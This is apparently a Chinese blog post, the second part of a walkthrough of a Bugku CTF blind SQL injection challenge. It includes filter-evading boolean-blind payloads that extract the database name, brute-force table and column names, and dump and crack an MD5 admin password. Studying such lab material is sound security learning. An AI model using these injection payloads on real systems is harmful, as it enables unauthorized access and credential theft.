sql注入-bugku题目解答记录(二)

原创 已于 2026-05-22 16:20:41 修改 · 585 阅读 · 6 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
GEO检测
标签
#sql #数据库 #渗透 #web安全 #安全
于 2026-05-22 16:19:47 首次发布

sql注入-bugku题目解答记录(一)连接:https://blog.csdn.net/AQAlie/article/details/161287963?spm=1001.2014.3001.5501

继续爆库名

刚想通爆库名的语句,准备实操一下

substr(reverse(substr((database())from(a)))from(7))>97#

不对!犯了个小错误,没有把取出的字符进行ascii转换,再加一层:

a'or(ascii(substr(reverse(substr((database())from(1)))from(8)))>97)#

前两个参数设置为从1到8,两者的和需要为9,最后一个从97到130,爆破后会发现有很多满足的,挑选其中前两个参数和为9的,最终得到ascii码为:98,108,105,110,100,115,113,108

转换后得到库名为:blindsql 

下一步,爆表名!!!

爆表名(以及字段名)

常规爆表名语句:

ascii(substr((select table_name from information_schema.tables where table_schema='blindsql' limit 0,1),n,1))=m

但很多字符被过滤掉了,这里尝试进行修改,先改好改的:

ascii(
  substr(
    (select(table_name)from(information_schema.tables)where(table_schema='blindsql')from(1))
    from(1))
    )
>m

但还是没法用的,因为等号和information也被过滤了

lz水平受限,手足无措了。查看网上其他大佬的方法,都不约而同的选择了爆破表名!

还真是力大砖飞啊

通过语句

a'or(SELECT($xx$)FROM(blindsql.$xx$))#

直接爆表名和字段名(我的天,采用急速炸弹方式的话,字典数量一大,爆破次数不敢想)

这里自己先去整理了一个表名和字段名的字典准备爆破,结果如下

得到表名为admin,字段分别为id和password,接着获取password中的数据

爆数据

先判断password的长度

a'or(length((select(password)from(admin))))>$1$#

爆破结果:

可知长度为32,接着继续爆破元素名。这里可以采用与爆破数据库名一样的方法

a'or(ascii(substr(reverse(substr((select(password)from(admin))from(1)))from(32)))>47)#


#即:
a'or(
  ascii(
    substr(
      reverse(
        substr(
          (select(password)
        from(admin))
      from(1))
    )from(32))
  )
>47)#

第一个from和第二个from的值和为32+1=33,大于范围为47-130

数量太大了,lz用的虚拟机跑bp爆破被卡死了一次,于是分成了三次跑,最终得到password值为:

4dcc88f8f1bc05e7c2ad1a60288481a2

放进随波逐流解码!!

居然解码失败,尝试网上在线解密,发现类型为MD5加密,解密得到明文为:

bugkuctf

尝试账号admin密码bugkuctf登录

得解!!

真不容易

提交,flag正确(终于!!)

其他

1.bp爆破模块中其实是能够对结果进行筛选的,在Filter中输入查找信息即可进行筛选

2.会写python脚本还是很有必要的。观摩其他大佬都是拿python脚本进行爆破的,lz没有学过python,使用起来还是很吃力的,bp爆破数量一大还是太容易崩了。还需要补一补python,任重道远

bugku—INSERT INTO注入解答
Just for funnnnnnnnnnnn
01-10 2324
本来不打算单独的ctf题目成文,但是这个题写payload快看花我的眼睛了,不写一篇记录一下代码对不住我的眼睛。 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $i...
sql注入-bugku题目解答记录(一)
AQAlie的博客
05-21 578
小小sql注入,操作它!
成绩查询-bugku题目解答记录
AQAlie的博客
05-18 494
注意:网站post传参和get传参方式不同,大部分是不通用的,可以自行在bp中的Repeater模块Request中右键选择change request method尝试发送,若没有回复则说明不通用(之前学习过程中确实有通用的)很好,传参名为id,构造sqlmap函数并在kali中执行(lz为第一次学习使用sqlmap,之前都是古法手动注入)还是没有收获,到目前为止一无所获,开始尝试查询输入(成绩查询有输入点,怀疑sql注入)接下来就是传统的爆表名,爆字段名,爆参数,不过这次是使用sqlmap进行。
bugku login1
ty070的博客
02-05 80
得到攻击方式大概是:admin+空格+字符串+自定义密码来冒充admin账号注册,随后在登陆框用admin账号登录。尝试注册账号发现admin已有加上随意注册的账号会弹出"不是管理员还想看flag”简单测了一下没发现明显的注入点。题目提示是 sql约束攻击。点击登录得到flag。
Flink Table API与SQL
weixin_46300935的博客
06-16 295
摘要: 本文介绍了Apache Flink的Table API,这是一个统一的关系型API,支持批处理和流处理,是SQL的超集。文章重点讲解了Table API的基础操作(如From、Select、Where、Distinct等)、表连接操作(Union、Join等)、聚合操作(GroupBy、OverWindow等)以及窗口操作(滚动窗口、滑动窗口、会话窗口)。通过Java和Scala代码示例,演示了如何使用Table API进行数据处理,包括时态Join和窗口聚合等高级功能。文中还强调了在处理无界数据时
TDengine SQL INSERT — 单行、批量、跨表与子表自动建表
TDengine(老段)专注时序数据库领域
06-22 343
5.写入路径 |:TDengine v3.x(v3.3.x / v3.4.x) | 最后更新:2026-06-22SQL INSERT 是 TDengine 最通用的写入方式。它支持单行/多行、单表/跨表、显式建表/隐式自动建表(USING 子句)等多种语法形式,是上层应用与 ETL 工具最常使用的入口。
用 Claude opus-4.8 辅助 Java 后端排查慢接口:从日志、SQL 到测试验证
her_heart的博客
06-21 493
本文以 Java Spring Boot 订单列表慢接口为例,介绍如何使用 Claude opus-4.8 辅助后端性能排查。文章从日志、代码、SQL、索引和调用链入手,展示 Prompt 写法、N+1 查询识别、SQL 执行计划验证、批量查询改造、压测与灰度观察方法,并对比 ChatGPT、Gemini、DeepSeek 在不同研发场景中的适用环节,强调 AI 只能辅助分析,最终仍需人工 Review、测试验证和数据闭环。
python psycopg2库 操作postgresql
最新发布
weixin_43989195的博客
06-23 349
介绍python 操作postgresql 库 psycopg2
【基础】PostgreSQL 数据导出
shen12138的博客
06-17 934
PostgreSQL 的导出其实可以很精细:先用查询摸清各表大小,再用pg_dump配合精准排除不需要的数据。这套「先查后导」的流程既能节省导出时间,又能控制备份文件的大小,值得在实际工作中推广使用。
PostgreSQL 技术日报 (6月14日)|CLT 锁策略迭代,两大行业峰会日程速览
IvorySQL的博客
06-16 282
🔔 关注【IvorySQL开源数据库社区】即可获取 PostgreSQL 一手干货与最新动态。
Flink Table API与SQL(四)
weixin_46300935的博客
06-17 270
FlinkSQL客户端是一个简化Flink数据分析流程的工具,它允许熟悉SQL但不熟悉Java/Scala的用户直接通过SQL语句与Flink集群交互。文章详细介绍了FlinkSQL客户端的基本使用、三种结果可视化模式(表格模式、变更日志模式、Tableau模式)、如何基于Standalone和Yarn集群提交SQL任务,以及各种TableConnector(如Filesystem、Kafka、UpsertKafka、JDBC、HBase)的配置与应用。 主要内容包括: FlinkSQL客户端:支持交互式S
Docker部署PowerJob,使用PostgreSql
qq_39543482的博客
06-22 38
1、下载镜像,创建容器并运行(修改IP地址192.168.0.1和数据库密码123456,控制台端口这里改为了10077)2、防火墙打开10077(web访问端口)和10010(HTTP 协议 Worker 心跳)4、查看部署结果,部署完初次账户:ADMIN密码:powerjob_admin。5、创建应用,并查询注册实例信息​​​​​​。
第07篇 · MyBatis核心原理:从接口到SQL的奇妙映射
2301_80720675的博客
06-18 600
第一次见到这个用法的人,多半会疑惑:接口没有实现,方法体是空的,MyBatis 是怎么把方法调用变成 SQL 执行的?这一篇,我们把 MyBatis 的核心原理拆开来看。
Flink Table API与SQL(三)
weixin_46300935的博客
06-17 429
FlinkSQL是Apache Flink中基于标准ANSI SQL语法的强大查询工具,支持DDL、DML和查询操作,并可通过窗口函数、Join连接和自定义函数实现复杂的数据处理。本文详细介绍了FlinkSQL的核心功能,包括三种窗口类型(滚动、滑动、累积)的使用,四种Join操作(常规、间隔、时态、维度)的应用场景,以及Top-N查询的实现。此外,还深入讲解了四种自定义函数(标量、表、聚合、表聚合)的开发方法,并通过基站日志分析等案例展示了实际应用。FlinkSQL通过Apache Calcite解析SQ
Spark SQL 基于DataSource方式读取数据时文件切分逻辑详解
wubinghua15180087610的博客
06-17 428
Spark SQL基于DataSource方式文件切分逻辑详解
离线数仓开发基础,开发语言(Hive SQL,Shell、Python),开发环境隔离,完整开发流程(面试高频追问)
Irene1991的博客
06-19 502
在数据仓库开发中,HiveSQL是核心开发语言,占比达70%以上,主要用于数据清洗、转换和汇总。Shell脚本(15%)用于调度任务封装,Python(10%)处理复杂业务逻辑和质量校验。数仓表数据存储在HDFS上,表结构元数据存放在MySQL等关系型数据库中,通过Hive进行管理。开发与生产环境严格隔离,通常分为开发、测试和生产三层,通过数据库名、HDFS目录和权限控制实现隔离。开发人员在生产环境仅需只读权限(SELECT),数据修复通过调度系统或DBA执行,确保安全可追溯。
PostgreSQL 技术日报 (6月15日)|PG19 性能优化推进,POSETTE 大会倒计时 2 天
IvorySQL的博客
06-16 311
🔔 关注【IvorySQL开源数据库社区】即可获取 PostgreSQL 一手干货与最新动态。
Flink Table API与SQL(一)
weixin_46300935的博客
06-16 610
本文介绍了Apache Flink的Table API和SQL编程模式,重点讲解了Table API与DataStream API的集成方式、动态表和时间属性等核心概念。主要内容包括: Table API与DataStream API转换: 提供了fromDataStream/toDataStream方法实现双向转换 详细介绍了三种转换方式:仅插入流、更新日志流和变更日志流 动态表与连续查询: 动态表随时间变化,支持连续查询处理流数据 解释了动态表的更新追加机制和查询限制 时间属性: 处理时间(PROCTI
sql - 子查询
pig_ning的博客
06-22 159
sql - 子查询
运维监控大屏踩坑记:一条 SQL 的“CASE 陷阱”与跨库优化实践
折哥|智能物流与Java实战,副高数据库工程师。深耕出版社物流WMS/OMS(线体/立库/VGA),也分享Java进阶与OMS电商对接。Oracle→PG实战派。相信沉淀可迁移能力,分享通用技术,不藏不虚。
06-22 430
摘要:监控大屏 ToC/ToB 业务拆分时,一条 Oracle SQL 因 CASE 在 JOIN ON 中返回布尔值触发 ORA-00920。本文复盘四种解决方案、跨库 dblink 性能优化,并对比 MySQL/PG 差异,附多数据库避坑指南。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值